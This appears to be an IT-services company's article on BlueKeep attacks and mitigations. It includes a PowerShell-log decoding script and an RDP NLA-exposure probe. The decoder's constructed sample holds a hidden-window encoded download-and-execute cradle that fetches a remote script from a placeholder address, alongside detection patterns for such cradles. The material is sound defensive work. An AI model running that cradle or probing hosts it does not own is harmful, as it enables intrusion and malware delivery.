Microsoft Confirms BlueKeep Attacks, Calls Users to Patch to Prepare for More Damaging Attacks
Microsoft has confirmed that BlueKeep is being exploited in the wild and warned that, as long as systems remain unpatched, future BlueKeep attacks will likely be more damaging than the ones seen so far.
What Is BlueKeep?
On May 14, 2019, Microsoft released a patch for the security vulnerability CVE-2019-0708, also known as BlueKeep, a pre-authentication remote code execution flaw in Remote Desktop Services. The vulnerability affects older versions of Windows, specifically Windows 7, Windows Server 2008 and Windows Server 2008 R2. Microsoft judged it serious enough to also ship fixes for the out-of-support Windows XP and Windows Server 2003. Windows 8 and Windows 10 are not affected.
According to Microsoft, this vulnerability is “wormable” when left unpatched: exploiting it requires no authentication and no user interaction, so any future malicious software (malware) that exploits it could propagate on its own from one vulnerable computer to the next, in the same way that the WannaCry malware spread across the globe on May 12, 2017, affecting hundreds of thousands of computers in less than 24 hours. The flaw sits in the service behind the Remote Desktop Protocol (RDP), which lets a user connect to another computer over a network; an attacker needs nothing more than network access to the RDP port to reach it.
The name BlueKeep, coined by Kevin Beaumont, joins the words “Blue” and “Keep”. “Blue” refers to the “blue screen of death”: a failed exploitation attempt is likely to crash the affected Windows system and reboot it. “Keep” is a nod to the Red Keep of Game of Thrones, the kind of moment a wormable exploit of this flaw could produce.
The BlueKeep attacks were brought to light by security researchers Kevin Beaumont and Marcus Hutchins. To monitor for BlueKeep attacks, Beaumont set up honeypots in different parts of the world. Honeypots are computers that act as decoys: they lure in attackers so that their methods can be studied.
Beaumont reported that on October 23 one of his BlueKeep honeypots crashed and rebooted, and that over the following weeks all of the honeypots except one in Australia crashed and rebooted with increasing regularity. Beaumont shared the crash data from the honeypots with Hutchins, who is best remembered for registering the kill-switch domain that halted the spread of WannaCry on May 12, 2017.
In a blog post for Kryptos Logic, Hutchins confirmed that the exploit that crashed Beaumont's honeypots matches the publicly available BlueKeep module for Metasploit: the crash dumps contained shellcode consistent with that module. Metasploit is an exploitation framework used for penetration testing; the BlueKeep module for it was released on September 6, 2019.
Hutchins also confirmed that the final payload of the BlueKeep exploit observed in the wild via Beaumont's honeypots was a cryptomining malware, that is, malware that illicitly hijacks the computing power of someone else's computer to mine cryptocurrency.
BlueKeep Crashes and Cryptocurrency Malware Installation
Microsoft said that the crashes are “likely associated with the use of the unstable BlueKeep Metasploit module on certain sets of vulnerable machines”. The company said that Microsoft Defender ATP customers have been protected against the BlueKeep Metasploit module since early September 2019; the same detections also let Microsoft collect telemetry on the attacks.
According to Microsoft, since September 6, 2019, the day the BlueKeep Metasploit module was released, it has observed an increase in RDP service crashes. Starting in October 2019, the software company said, it has also observed an increase in memory corruption crashes.
In both the September 2019 and the October 2019 activity, wherever the exploit did not crash the system, a cryptomining malware was installed. This, Microsoft said, indicates that the same malicious actors were likely responsible for both cryptomining campaigns.
The software company added that the actors behind the campaigns had probably been running cryptomining attacks for some time and simply added the BlueKeep exploit to their arsenal. Microsoft said its Microsoft Defender ATP flagged the installation of this cryptomining malware on computers in France, Russia, Italy, Spain, Ukraine, Germany, the United Kingdom and many other countries.
According to Microsoft, the recorded BlueKeep attacks began with scanning the internet for vulnerable internet-facing RDP services. Once a vulnerable service was found, the attackers used the BlueKeep Metasploit module to run a PowerShell script that downloaded and launched several further encoded PowerShell scripts, which in turn downloaded and launched the cryptomining malware.
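The chain just described (an encoded PowerShell launcher that pulls further encoded stages from the network before the miner lands) is what a defender sees in process-creation telemetry. The Python script below is an added example for this article, not Microsoft's detection logic or anything published by the researchers. It pulls the `-EncodedCommand` argument (and its `-e`, `-ec`, `-enc` short forms) out of process-creation records, decodes the base64-of-UTF-16LE payload layer by layer, and flags download cradles, in-memory execution and nested encoded stages. The log field names, the host name SRV-2008R2, the documentation address 203.0.113.5 and the script bodies inside the samples are all constructed for the example.

```python
"""Decode staged, base64-encoded PowerShell launches from process-creation logs.

Added example for this article; it is not Microsoft's or Kryptos Logic's detection
logic. The log records and the scripts inside them are constructed here to resemble
the chain in the text (an encoded PowerShell launcher that pulls further encoded
stages from the network). Field names and the host name are assumptions.
"""
import base64
import re

# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the argument is base64 of
# the script text encoded as UTF-16LE.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# What the decoded stages are checked for.
INDICATORS = {
    "download cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "in-memory execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "inline base64 blob": re.compile(r"FromBase64String", re.I),
}
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def encode_command(script: str) -> str:
    """Produce what an attacker passes to -EncodedCommand (used here to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_layers(b64: str, max_depth: int = 8) -> list:
    """Decode an -EncodedCommand payload, then keep peeling any nested encoded stage."""
    layers = []
    for _ in range(max_depth):
        try:
            text = base64.b64decode(b64).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            break  # not a valid encoded command; stop with what was decoded so far
        layers.append(text)
        inner = ENC_RE.search(text)
        if not inner:
            break
        b64 = inner.group(1)
    return layers


def triage(lines: list) -> list:
    """Return one finding per encoded PowerShell launch, with decoded stages and indicators."""
    findings = []
    for line in lines:
        m = ENC_RE.search(line)
        if not m:
            continue  # not an encoded PowerShell launch
        layers = decode_layers(m.group(1))
        decoded = "\n".join(layers)
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if HIDDEN_RE.search(line + "\n" + decoded):
            hits.append("hidden window")
        if len(layers) > 1:
            hits.append("nested encoded stage")
        host = re.search(r"Computer=(\S+)", line)
        findings.append({
            "computer": host.group(1) if host else "?",
            "layers": layers,
            "indicators": hits,
            # A cradle or IEX inside an encoded command is the pattern the article describes.
            "suspicious": bool({"download cradle", "in-memory execution"} & set(hits)),
        })
    return findings


# Constructed samples. 203.0.113.5 is a documentation address, not a real host.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/m.ps1')"
STAGE0 = f"powershell.exe -NoP -W Hidden -Enc {encode_command(STAGE1)}"
BENIGN = "Get-Service TermService | Select-Object Status"
SAMPLE_LOG = [
    f'EventID=4688 Computer=SRV-2008R2 CommandLine="powershell.exe -EncodedCommand {encode_command(STAGE0)}"',
    f'EventID=4688 Computer=SRV-2008R2 CommandLine="powershell.exe -enc {encode_command(BENIGN)}"',
    'EventID=4688 Computer=SRV-2008R2 CommandLine="notepad.exe C:\\notes.txt"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["computer"], "SUSPICIOUS" if f["suspicious"] else "ok", f["indicators"])
        for depth, layer in enumerate(f["layers"]):
            print(f"  stage {depth}: {layer[:80]}")
```

Fed real 4688 or Sysmon process-creation records, the same `triage` call gives you the fully decoded chain rather than an opaque blob, which is what you need to pivot to the download host and the miner. Encoded commands are not malicious by themselves (the benign sample decodes cleanly and gets no indicators); the signal is the cradle and the staging.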
“Security signals and forensic analysis show that the BlueKeep Metasploit module caused crashes in some cases, but we cannot discount enhancements that will likely result in more effective attacks,” Microsoft said. “In addition, while there have been no other verified attacks involving ransomware or other types of malware as of this writing, the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners.”
Preventive and Mitigating Measures Against BlueKeep
According to Beaumont, more than 724,000 Windows systems worldwide are still unpatched and reachable from the internet, and so remain open to BlueKeep attacks.
Here are some of the preventive and mitigating measures against BlueKeep attacks:
1. Disable RDP
BlueKeep is exploited through RDP, a legitimate component of Windows, so a successful attack against an internet-facing RDP service can leave few obvious traces. RDP is often exposed to the public internet by suppliers and other third parties who occasionally manage systems, and then forgotten. If a system does not need RDP, disable it. If RDP must stay enabled, require Network Level Authentication (NLA): Microsoft lists NLA as a mitigation because it forces the client to authenticate before the vulnerable code path is reached, so an attacker without valid credentials cannot trigger the flaw. NLA is a mitigation, not a fix, and the patch is still required. Either way, monitor RDP network traffic and the relevant logs for suspicious activity.
2. Block TCP Port 3389
Block inbound TCP port 3389 at the perimeter firewall, and on host firewalls wherever RDP is not needed. This stops unauthenticated scanning and exploitation from the internet. Two caveats: an RDP service moved to a non-standard port is just as vulnerable, so block the service and not only the default port number; and a perimeter block does nothing against a worm that is already inside the network, which is why the patch is still required.
3. Apply Patch
As long as systems remain unpatched, Microsoft said, BlueKeep will remain a threat. Apply Microsoft's May 2019 security update for CVE-2019-0708 to every affected Windows 7, Windows Server 2008 and Windows Server 2008 R2 system in your organization (and to any out-of-support Windows XP or Windows Server 2003 still in use, for which Microsoft published a separate update), reboot, and then verify that the update is actually installed rather than merely approved in your patch management tool.
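The scanning step described earlier and the three measures above come down to one question per host: is an RDP listener reachable, and does it let an unauthenticated client negotiate standard RDP security? The Python probe below is an added example for this article, not Microsoft's tooling or either researcher's scanner. It sends the X.224 Connection Request carrying an RDP Negotiation Request, as laid out in the MS-RDPBCGR specification, asking only for standard RDP security, and classifies the server's Connection Confirm: a server that enforces NLA refuses with the failure code HYBRID_REQUIRED_BY_SERVER, while a server that accepts the request can be reached before any authentication and is the first to patch or firewall. The status labels, the constructed reply bytes and the `probe` helper are this example's own assumptions. It checks exposure and NLA enforcement only; it does not test for CVE-2019-0708, and a host that refuses the probe still needs the patch because NLA only blocks exploitation without credentials.

```python
"""Check whether an RDP listener lets an unauthenticated client negotiate standard RDP security.

Added example for this article, not Microsoft's or the researchers' tooling. The message
layout follows MS-RDPBCGR (X.224 Connection Request/Confirm with RDP negotiation data);
the status labels and the constructed replies are this example's own.
"""
import socket
import struct

PROTOCOL_RDP = 0x00000000        # standard RDP security: no TLS, no CredSSP/NLA
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x05
FAILURE_CODES = {                # RDP_NEG_FAILURE failureCode values from MS-RDPBCGR
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols: int = PROTOCOL_RDP) -> bytes:
    """TPKT header + X.224 Connection Request TPDU + RDP_NEG_REQ."""
    # RDP_NEG_REQ: type 0x01, flags, length 8, requestedProtocols (all little-endian)
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)
    # X.224 CR: LI counts every byte after itself; code 0xE0 (CR, CDT 0); DST-REF, SRC-REF, class
    x224 = struct.pack(">BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    # TPKT: version 3, reserved, total length (big-endian)
    return struct.pack(">BBH", 0x03, 0x00, 4 + len(x224)) + x224


def parse_connection_confirm(data: bytes) -> dict:
    """Classify the server's reply to the request above."""
    if len(data) < 11 or data[0] != 0x03:
        return {"status": "not-rdp", "detail": "no TPKT/X.224 Connection Confirm"}
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    code = data[5]
    if (code & 0xF0) != 0xD0:              # X.224 Connection Confirm TPDU code
        return {"status": "not-rdp", "detail": f"unexpected X.224 TPDU code 0x{code:02x}"}
    neg = data[11:tpkt_len]                # optional rdpNegData after the 7-byte x224Ccf
    if len(neg) < 8:
        # A bare Connection Confirm is how older servers accept a PROTOCOL_RDP-only request.
        return {"status": "standard-rdp", "detail": "no negotiation data; standard RDP security selected"}
    ntype, _flags, _length, value = struct.unpack("<BBHI", neg[:8])
    if ntype == TYPE_RDP_NEG_RSP:
        if value == PROTOCOL_RDP:
            return {"status": "standard-rdp", "detail": "server accepted standard RDP security; NLA not enforced"}
        return {"status": "secured", "detail": f"server selected protocol 0x{value:x}"}
    if ntype == TYPE_RDP_NEG_FAILURE:
        name = FAILURE_CODES.get(value, f"0x{value:x}")
        status = "nla-required" if value == HYBRID_REQUIRED_BY_SERVER else "secured"
        return {"status": status, "detail": f"RDP_NEG_FAILURE {name}"}
    return {"status": "unknown", "detail": f"negotiation type 0x{ntype:02x}"}


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> dict:
    """Connect, send the request and classify the reply (needs network access to the host)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_connection_request())
            return parse_connection_confirm(s.recv(1024))
    except OSError as exc:
        return {"status": "unreachable", "detail": str(exc)}


# Constructed replies so the parser can be exercised without a live host.
REPLY_NLA_REQUIRED = bytes.fromhex("03000013" "0ed00000123400" "03000800" "05000000")
REPLY_STANDARD_RDP = bytes.fromhex("03000013" "0ed00000123400" "02000800" "00000000")
REPLY_TLS_SELECTED = bytes.fromhex("03000013" "0ed00000123400" "02000800" "01000000")
REPLY_BARE_CONFIRM = bytes.fromhex("0300000b" "06d00000123400")

if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        result = probe(target)
        print(f"{target}: {result['status']} ({result['detail']})")
```

Run it against your own hosts, passing a different port to `probe` if RDP was moved off 3389. Any host that comes back as standard-rdp is reachable by an unauthenticated client exactly as the attackers' scanners see it; nla-required hosts are shielded from credential-less exploitation but still unpatched until you confirm the update.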
We offer a fast 30-minute response to mitigate the IT risks such as BlueKeep and beyond. Call us today (416) 920-3000 or email firstname.lastname@example.org and protect your organizational IT.